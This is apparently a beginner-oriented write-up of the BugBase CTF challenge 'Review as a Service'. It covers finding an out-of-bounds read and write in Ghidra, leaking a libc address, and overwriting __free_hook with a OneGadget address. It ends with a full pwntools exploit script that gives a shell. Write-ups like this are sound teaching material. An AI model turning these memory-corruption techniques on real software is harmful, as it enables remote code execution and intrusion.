BugBase - RaaS

A beginner-friendly introduction to heap-related CTF challenges.

Background

First of all, I don't usually post write-ups for CTF challenges because there's often an abundance of existing write-ups for the challenges I am capable of solving (i.e. the easiest ones).

However, after many CTFs in which I had to skip the binary challenges involving malloc and free because I didn't even know what to do with the provided libc shared library, I finally decided during the BugBase CTF to take some time to learn about the heap and how to approach this sort of challenge.

In the end, I wasn't able to solve the challenge in time - and ironically, it's not even a heap exploitation challenge - but I finally got around to learning the process of analysing this type of challenge.

And since that's something rarely found in any other writeup, I'll share all my steps here with the hope that it may prove useful to others.

Review as a Service (RaaS) - 250pts

Below you can find the challenge files (courtesy of the challenge author @J43G3R):

Getting Started

First things first, after running strings on the binary we'll simply execute it:

Well, that didn't print out a flag. Instead, it appears that we can enter some strings before being dropped into a typical menu that allows us to view, edit and delete those strings. Finally, we can also exit after entering another string and rating the service.

Okay, time to whip out our favourite decompiler or disassembler, whatever floats your boat, and statically analyse the code of this program. I'll be using Ghidra here.

Reverse Engineering

This write-up does not focus on reverse engineering, so I'll only highlight the interesting bits and pieces - the rest is left as an exercise for the reader.

After renaming and retyping some of the variables in the code, we can start to make sense of the variables that are placed on the stack during the main function. Ghidra displays them like this:

Note that Ghidra uses the annotation Stack[-0x38] to indicate the location of the variable right at the entry of the function. In this case, reviewPtrArray will be stored 56 (0x38) bytes below the stack pointer at the time of entering the main function. Keep in mind that the function starts by pushing the previous frame pointer onto the stack and uses the new stack pointer value as new frame pointer. This will be important later.
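To make the two notations easier to compare, here is a minimal sketch of the conversion between Ghidra's entry-relative offsets and RBP-relative offsets. It assumes the standard `push rbp; mov rbp, rsp` prologue described above; the helper name is made up for illustration.

```python
def ghidra_to_rbp(stack_offset: int) -> int:
    """Convert a Ghidra Stack[offset] value to an RBP-relative offset.

    Ghidra measures from the stack pointer at function entry, which points
    at the return address. After `push rbp; mov rbp, rsp`, RBP sits 8 bytes
    below that, so every offset shifts by +8 when expressed relative to RBP.
    """
    return stack_offset + 8


# reviewPtrArray, shown by Ghidra as Stack[-0x38], relative to RBP
print(hex(ghidra_to_rbp(-0x38)))
```

With this convention the return address (Stack[0x0]) ends up at RBP+8 and the saved frame pointer at RBP+0.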

Should any of this sound weird to you, feel free to check out my Buffer Overflow article where I explain the 32-bit stack in more detail. Here we are on a 64-bit system but the concepts remain the same.

Not wasting any time, I have marked three variables that may seem important to us: a string array that seems to store review pointers, a 32 character string that holds the product names and a final string called storeName. They are contiguous on the stack and should we be able to overflow one of them we might control the other.

Analyzing the first few lines, we find the loop that lets us add 4 reviews right at the start.

Okay, so the program is dynamically allocating 48 bytes for each review and stores the 4 names (each maximum 8 characters long) in the productNameArray filling out the 32 bytes we saw.

Next, we look at what we can do with the menu options. Here, two of them stand out:

Looking at menu option 1 (view), we can see that no index check is performed before our input is used to calculate the address of the string that will be printed out (right side, red box).

Now, being able to read memory potentially allows us to read addresses that will later help us to defeat ASLR. So we'll definitely keep that option in mind.

Option 2 (edit) looks almost identical to option 1, except that here the index must be below 4 and, instead of reading from the calculated address, we can write to it (read(0,<address>,8) reads up to 8 bytes from stdin and writes them to <address>).

Notice how we can specify negative values for the reviewIndex? Basically, this enables us to write 8 arbitrary bytes to the memory below the productNameArray.
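The address arithmetic behind both menu options can be sketched in a few lines. This is only a model of what the decompiled code appears to do: the base address is a made-up value, and the check is assumed to be a signed comparison against 4 with no lower bound.

```python
ENTRY_SIZE = 8  # each slot in productNameArray is 8 bytes wide


def slot_address(array_base: int, index: int) -> int:
    """Address the program computes: productNameArray + index * 8."""
    return array_base + index * ENTRY_SIZE


def edit_check_passes(index: int) -> bool:
    """Model of the edit option's check: only an upper bound, signed compare."""
    return index < 4


base = 0x7FFC00001000  # hypothetical stack address of productNameArray
for idx in (0, 3, -1, 11):
    print(idx, hex(slot_address(base, idx)), edit_check_passes(idx))
```

Index 11 is rejected by the edit check (but not by the view option, which has no check at all), while -1 passes and lands 8 bytes below the array.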

Well, what about the adjacent pointer, storeName? We saw that it's right below the productNameArray and if we pay attention to the last few lines of code, we can see that we can extend that write to any address we want:

If we were to use menu option 2 to overwrite the storeName with an address, we could later use the line in the red box to write 8 bytes to that address, effectively allowing us to write 8 bytes to any address we want.
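The two-step write can be illustrated with a toy memory model. Everything here is hypothetical (the addresses, the `ToyMemory` class, and the assumption that the storeName pointer sits exactly one 8-byte slot below productNameArray); it only demonstrates why overwriting a pointer first turns a limited write into an arbitrary one.

```python
import struct


class ToyMemory:
    """A tiny flat memory model (address -> byte), for illustration only."""

    def __init__(self):
        self.data = {}

    def write(self, addr: int, payload: bytes) -> None:
        for i, b in enumerate(payload):
            self.data[addr + i] = b

    def read(self, addr: int, n: int) -> bytes:
        return bytes(self.data.get(addr + i, 0) for i in range(n))

    def read_ptr(self, addr: int) -> int:
        return struct.unpack("<Q", self.read(addr, 8))[0]


PRODUCT_NAMES = 0x1000               # hypothetical address of productNameArray
STORE_NAME_SLOT = PRODUCT_NAMES - 8  # assumed location of the storeName pointer
TARGET = 0x4000                      # hypothetical address we want to overwrite

mem = ToyMemory()
mem.write(STORE_NAME_SLOT, struct.pack("<Q", 0x2000))  # original heap pointer

# Step 1: editing index -1 overwrites the storeName pointer itself.
mem.write(PRODUCT_NAMES + (-1) * 8, struct.pack("<Q", TARGET))

# Step 2: the final read(0, storeName, 8) writes wherever storeName now points.
mem.write(mem.read_ptr(STORE_NAME_SLOT), b"AAAAAAAA")

print(mem.read(TARGET, 8))
```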

Initially, this is where I would get stuck because I was unsure where I should write what and how I could turn any of that into RCE. Additionally, I hadn't even touched the provided libc library yet, what's up with that? Let's get into that.

Exploitation

Alright, we've identified some flaws in the program - now let's get cracking. First of all, let's deal with the libc.so.6.

Setting up libc

Whenever you write and compile a C program, chances are you're using some existing functions like printf. But you've never defined that function yourself, have you? That's because it's part of the C standard library, or libc for short. This library is linked at runtime by the dynamic linker, which loads the library into memory so that the program can access its functions.

As with every other program and library, there are different versions and implementations of libc out there. So when the challenge author hands out a specific C library, it's safe to assume that we'll need that exact libc version/implementation for our exploit.

When we simply execute the binary, it automatically links against our installed standard library. In terms of functionality, this won't make a difference: malloc (also a libc function) will always reserve memory and printf will always print a string. But internal implementations and addresses of functions may very well differ.

Enough with the theory, what do we do with the library?

First of all, in order to analyse the binary together with the right library, we'd have to patch the binary to use a linker whose version matches the one of the library. Using strings, Google and patchelf that could be achieved manually. Then we could set the environment variable LD_PRELOAD to the location of our custom library and finally execute the program. One example for that process would be this (otherwise unrelated) writeup.
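As a rough sketch of those manual steps, the snippet below only builds the patchelf command and the environment, without running anything. It assumes the binary is called RaaS and that a matching linker has already been obtained; the linker file name used here is hypothetical.

```python
import os
import shlex


def manual_setup(binary: str, linker: str, libc: str):
    """Build (but do not run) the patch command and the run environment."""
    # patchelf's --set-interpreter rewrites the ELF interpreter path.
    patch_cmd = ["patchelf", "--set-interpreter", linker, binary]
    # LD_PRELOAD makes the dynamic linker load our libc before any other.
    env = dict(os.environ, LD_PRELOAD=os.path.abspath(libc))
    return patch_cmd, env


# "./ld-linux-x86-64.so.2" is a placeholder name for the matching linker.
cmd, env = manual_setup("./RaaS", "./ld-linux-x86-64.so.2", "./libc.so.6")
print(shlex.join(cmd))
print("LD_PRELOAD=" + env["LD_PRELOAD"])
```

To actually apply it, the command list could be handed to `subprocess.run(cmd, check=True)` and the binary started with `subprocess.run(["./RaaS"], env=env)`.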

Fortunately, we don't have to do these steps manually, as there's a tool that does all of that for us. However, I thought it may be good to know what that tool actually does.

Introducing pwninit:

Either download a release binary or build the tool from source and you are ready to go. Place the two challenge files into the same directory, and simply call pwninit.

Although pwninit comes with lots of options and flags, the default invocation does all the heavy lifting and creates a new binary called RaaS_patched.

Now let's see what's different. When we execute the patched binary, everything looks the same. But if we look at the memory mappings for the patched binary, we can see that now the custom libc is being used instead of the default one.

Feel free to compare the output of the patched binary with the output of the original binary.

You may ask yourself why we would need to leak an address if /proc/<process pid>/maps shows all the addresses (we can see the heap, the libc and the stack). Try restarting the binary and viewing the memory mapping again: the addresses will change, which is the direct result of ASLR.
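If you want to compare the mappings across several runs without reading them by eye, a small parser helps. The sketch below extracts the lowest libc mapping from text in the /proc/<pid>/maps format; the sample lines are illustrative, not captured output, and the function name is my own.

```python
def libc_base_from_maps(maps_text: str) -> int:
    """Return the lowest start address of any mapping whose path mentions libc."""
    starts = []
    for line in maps_text.splitlines():
        fields = line.split()
        # A file-backed mapping has at least 6 fields; the sixth is the path.
        if len(fields) >= 6 and "libc" in fields[5]:
            start = fields[0].split("-")[0]
            starts.append(int(start, 16))
    if not starts:
        raise ValueError("no libc mapping found")
    return min(starts)


# Illustrative sample in the /proc/<pid>/maps format (paths and inodes made up).
SAMPLE = """\
7ffff7dd5000-7ffff7df7000 r--p 00000000 08:01 1234 /tmp/raas/libc.so.6
7ffff7df7000-7ffff7f6f000 r-xp 00022000 08:01 1234 /tmp/raas/libc.so.6
7ffffffde000-7ffffffff000 rw-p 00000000 00:00 0 [stack]
"""
print(hex(libc_base_from_maps(SAMPLE)))
```

For a live process, the text could come from `open(f"/proc/{pid}/maps").read()`; with ASLR enabled, the printed base should differ between runs.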

Okay fine, we have libc set up - what's next?

Leaking the libc base address

Since our final goal is remote code execution, we are looking for some way to redirect code execution and spawn a shell. However, we've seen that ASLR causes the address layout to be different each time, basically rendering hardcoded addresses useless.

If we could manage to extract any libc address from the program during runtime though, we could then simply work with offsets from that address to pinpoint gadgets and other useful locations in the library.

And that's exactly what we'll achieve with the vulnerability identified in the menu option 1. Quick recap, we can print a string value at any memory address from:

productNameArray + <input> * 8

If we remember Ghidra's variable output, we saw that productNameArray is at Stack[-0x58] (or, directly in the assembler code, RBP-0x50). And if you know your C calling conventions, you'll remember which address is stored directly above the saved RBP: the return address of the current function.

The main function in C is actually called by another function called __libc_start_main which, as you may have guessed, is a libc function. Hence, the return address of main will be an address pointing to the next assembler instruction after the call from within libc.

So, productNameArray + 11 * 8 should print the return address (11*8 = 88 = 0x58).
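The index calculation can be written down as a small helper. It works purely on Ghidra's entry-relative offsets, where the return address sits at Stack[0x0]; the function and constant names are made up for this sketch.

```python
PRODUCT_NAME_ARRAY = -0x58  # Ghidra: Stack[-0x58]
RETURN_ADDRESS = 0x0        # the return address sits at Stack[0x0]
SLOT = 8                    # the view option multiplies the index by 8


def index_for(target_offset: int, array_offset: int = PRODUCT_NAME_ARRAY) -> int:
    """Index that makes productNameArray + index * 8 hit the target slot."""
    distance = target_offset - array_offset
    if distance % SLOT:
        raise ValueError("target is not 8-byte aligned relative to the array")
    return distance // SLOT


print(index_for(RETURN_ADDRESS))  # 11
```

The same helper gives index 10 for the saved frame pointer at Stack[-0x8].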

We can leak the return address with menu option 1 and entering 11 for the index.

We'll put together the exploit only in the end to save some time and space.

But how do we get the actual libc base address from only that address now? Let's use gdb.

First, we set a breakpoint in the main function and run the program. Immediately, we hit the breakpoint and look at the return address on the stack (RBP+8). That's the value we will leak with the menu option 1 later. We can then ask gdb to disassemble the code at that address and it turns out that we were right and the address does indeed belong to the function __libc_start_main.

Next, let's see the memory mapping of the program in gdb:

The libc is loaded into memory starting at address 0x7ffff7dd5000. The return address points to 0x7ffff7df9083. Therefore, subtracting the difference between the two from any leaked return address will give us the current libc base address. The difference is 0x7ffff7df9083 - 0x7ffff7dd5000 = 0x24083.

The offset from the leaked address to the libc base is 0x24083.
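As a quick check of that arithmetic, here is a minimal sketch that recovers the base from a leak and verifies that the result is page-aligned, which a real libc base always is. The function name is my own.

```python
LIBC_LEAK_OFFSET = 0x24083  # return address of main minus libc base


def libc_base_from_leak(leak: int) -> int:
    """Subtract the fixed offset and sanity-check the page alignment."""
    base = leak - LIBC_LEAK_OFFSET
    if base & 0xFFF:
        raise ValueError(f"suspicious libc base {base:#x}: not page-aligned")
    return base


print(hex(libc_base_from_leak(0x7FFFF7DF9083)))  # 0x7ffff7dd5000
```

A failed alignment check usually means the leak was parsed incorrectly or the wrong libc is loaded.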

Alright, we got the libc base address, what now?

Overwriting `__free_hook`

As we've found out earlier, we can overwrite any address we want with 8 bytes.

One possible option is to overwrite a libc function hook. Basically, the libc version we're given provides several hooks that allow programmers to modify the behavior of existing functions. See this man page for more details. Note that these are deprecated in newer versions of libc.

One of these hooks is called __free_hook, a function pointer that will be accessed whenever free is called. And this is exactly what happens right before our program closes (free(storeName)).
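Conceptually, the hook mechanism behaves like the toy model below. It is a deliberate simplification in Python, not glibc's code: the real hook is a C function pointer that also receives the caller's address, and all names here are placeholders.

```python
free_hook = None  # stands in for the __free_hook function pointer (NULL)
calls = []        # records what happened, for demonstration


def real_free(ptr):
    calls.append(("real_free", ptr))


def free(ptr):
    """Toy free(): a non-NULL hook is called instead of doing the real work."""
    hook = free_hook
    if hook is not None:
        return hook(ptr)
    return real_free(ptr)


def one_gadget(ptr):
    # Placeholder for "execution continues at an attacker-chosen address".
    calls.append(("shell", ptr))


free(0x1000)            # hook is unset: normal behaviour
free_hook = one_gadget  # the 8-byte overwrite
free(0x2000)            # now control flow is redirected
print(calls)
```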

In gdb we can use print &__free_hook to print the address of that pointer.

Using the determined libc base address, we can calculate the offset of __free_hook to the base with: 0x7ffff7fc3e48 - 0x7ffff7dd5000 = 0x1eee48.

The offset from the __free_hook to the libc base is 0x1eee48.

On to the final part, what are we going to write to that address?

Introducing OneGadget. In essence, OneGadget allows us to find sequences of useable assembler instructions that will do all the work for us and spawn a shell. This is possible, because the libc library may very well already contain code for this sort of action.

Once we have installed it, we can run it on our given library:

OneGadget will display the offsets from the libc base and also show constraints for each gadget. So before we are going to use one of them, let's see which one matches all constraints.

For this purpose, we add a breakpoint right before the final free is executed and analyse the registers using gdb:

As we can see, r12 contains some value instead of NULL, meaning the constraints for the first gadget are not met. However, we fulfill the criteria for the other two gadgets, so let's try using the one-gadget with an offset of 0xe3b01.

Though 0xe3b04 appears to be a match as well, it did not work for me. So keep in mind to try different gadgets should the final shell fail (or dive deeper to reliably validate the constraints).
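One way to make the constraint check less error-prone is to script it. The sketch below evaluates constraints of the form `reg == NULL || [reg] == NULL` against a register snapshot. The register values, memory contents, and constraint lists are hypothetical placeholders, not the actual OneGadget output for this libc.

```python
def constraint_ok(reg_value: int, memory: dict) -> bool:
    """True if `reg == NULL || [reg] == NULL` holds.

    `memory` maps addresses to the 8-byte value stored there; an address
    missing from the map is treated as unreadable, so the check fails.
    """
    if reg_value == 0:
        return True
    return memory.get(reg_value) == 0


def gadget_usable(required_regs, registers: dict, memory: dict) -> bool:
    """A gadget is usable only if every one of its constraints holds."""
    return all(constraint_ok(registers[r], memory) for r in required_regs)


# Hypothetical snapshot taken at the breakpoint before the final free.
registers = {"r12": 0x401180, "r15": 0x0, "rdx": 0x0}
memory = {0x401180: 0x8949ED31FA1E0FF3}
# Hypothetical constraint lists; copy the real ones from the tool's output.
gadgets = {"gadget_a": ["r15", "r12"], "gadget_b": ["r15", "rdx"]}

for name, regs in gadgets.items():
    print(name, gadget_usable(regs, registers, memory))
```

Even when all constraints appear to hold, a gadget can still fail, so trying the alternatives remains a sensible fallback.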

We've successfully identified a suitable one-gadget at offset 0xe3b01.

So the idea of our final exploit becomes:

Leak an address from the stack to calculate the libc base address
Overwrite a pointer on the stack (storeName) to point to __free_hook
Use the final read operation to write the address of a one-gadget to __free_hook
When the final free is called, execution continues at the one-gadget and spawns a shell
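The arithmetic behind this plan can be checked offline before touching the target. This sketch uses only the standard library (`struct.pack("<Q", ...)` does the same job as pwntools' `p64`) and the offsets determined above; the function name is my own.

```python
import struct

LIBC_LEAK_OFFSET = 0x24083
FREE_HOOK_OFFSET = 0x1EEE48
ONEGADGET_OFFSET = 0xE3B01


def build_payloads(leak: int):
    """Return the two 8-byte little-endian payloads for the two writes."""
    base = leak - LIBC_LEAK_OFFSET
    free_hook = base + FREE_HOOK_OFFSET
    one_gadget = base + ONEGADGET_OFFSET
    # First write: new value for storeName. Second write: new __free_hook.
    return struct.pack("<Q", free_hook), struct.pack("<Q", one_gadget)


first, second = build_payloads(0x7FFFF7DF9083)  # leak observed in gdb
print(first.hex(), second.hex())
```

With the gdb values from above, the first payload decodes to 0x7ffff7fc3e48, matching the __free_hook address seen earlier.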

Writing the exploit

This writeup focused on setting up and analyzing a binary challenge with a custom libc version. Writing the exploit is now just a matter of stitching all the pieces together using Python and pwntools.

#!/usr/bin/env python3

from pwn import *

LIBC_LEAK_OFFSET = 0x24083
FREE_HOOK_OFFSET = 0x1eee48
ONEGADGET_OFFSET = 0xe3b01

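def view_review(p, index):
	# menu option 1: print the 8-byte slot at productNameArray + index * 8
	p.recvuntil(b'choice>> ')
	p.send(b'1\n')
	p.recvuntil(b'[0-3]: ')
	p.send(str(index).encode() + b'\n')
	# bytes 15-20 of the response hold the leaked address; pad to 8 bytes for u64
	return u64(p.recvuntil(b'No such product')[15:21]+b'\x00\x00')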

def edit_review(p, free_hook):
	p.recvuntil(b'choice>> ')
	p.send(b'2\n')
	p.recvuntil(b'[0-3]: ')
	p.send(b'-1\n')
	p.recvuntil(b'Review\n')
	p.send(b'1\n')
	p.recvuntil(b'name: ')
	p.send(free_hook)

def call_exit(p, one_gadget):
	p.recvuntil(b'choice>> ')
	p.send(b'4\n')
	p.recvuntil(b'store: ')
	p.send(one_gadget)
	p.recvuntil(b'[1-5]: ')
	p.send(b'5\n')

def main():
	p = process('./RaaS_patched')
	# in a CTF connect to the real target with remote(ip, port)

	for _ in range(4):
		p.recvuntil(b'review \n')
		p.send(b'a\n')
		p.recvuntil(b'name: ')
		p.send(b'b\n')

	# leak a libc address
	libc_leak = view_review(p, 11)

	# calculate real address
	libc_base = libc_leak - LIBC_LEAK_OFFSET
	free_hook = libc_base + FREE_HOOK_OFFSET
	onegadget = libc_base + ONEGADGET_OFFSET

	# write address of __free_hook to char *storeName
	edit_review(p, p64(free_hook))

	# write onegadget to __free_hook
	call_exit(p, p64(onegadget))

	# wait for shell
	p.interactive()

	p.close()

if __name__ == '__main__':
	main()
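A note on the slice in view_review: the address is printed as a string, so output stops at the first null byte, and user-space addresses on x86-64 Linux have their two most significant bytes set to zero. That is why only 6 bytes arrive and two null bytes are appended before unpacking. A standalone sketch of that decoding step, using only the standard library (the helper name is my own):

```python
def decode_leak(raw: bytes) -> int:
    """Pad a truncated little-endian pointer to 8 bytes and decode it."""
    if len(raw) > 8:
        raise ValueError("a 64-bit pointer cannot be longer than 8 bytes")
    return int.from_bytes(raw.ljust(8, b"\x00"), "little")


raw = bytes.fromhex("8390dff7ff7f")  # the gdb return address as it would be printed
print(hex(decode_leak(raw)))  # 0x7ffff7df9083
```

If a leaked address happens to contain a null byte in its lower bytes, the output is cut short and the run has to be repeated.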

We've successfully exploited "Review as a Service" by leaking a libc address and overwriting the __free_hook, ultimately gaining RCE.

Final Thoughts

Alright, this concludes our journey into my first binary almost-heap challenge. In the end, we did not exploit the heap at all but I believe that the knowledge gained during this challenge can easily be transferred to get started with other binary and actual heap challenges. The setup and analysis process remains mostly the same and knowledge of libc is generally required in order to understand and exploit the heap.

If you want to learn about the heap, I can recommend the Azeria Labs articles but as always there will be a lot of googling and stitching information together from various resources, such as my own heap layout infographic (shameless self plug).

Finally, I want to give a huge shoutout to the challenge author @J43G3R over at the BugBase discord, who supported me even after the CTF had ended by answering my questions and sharing his valuable knowledge!

If you have any feedback or questions, feel free to reach out via Discord.
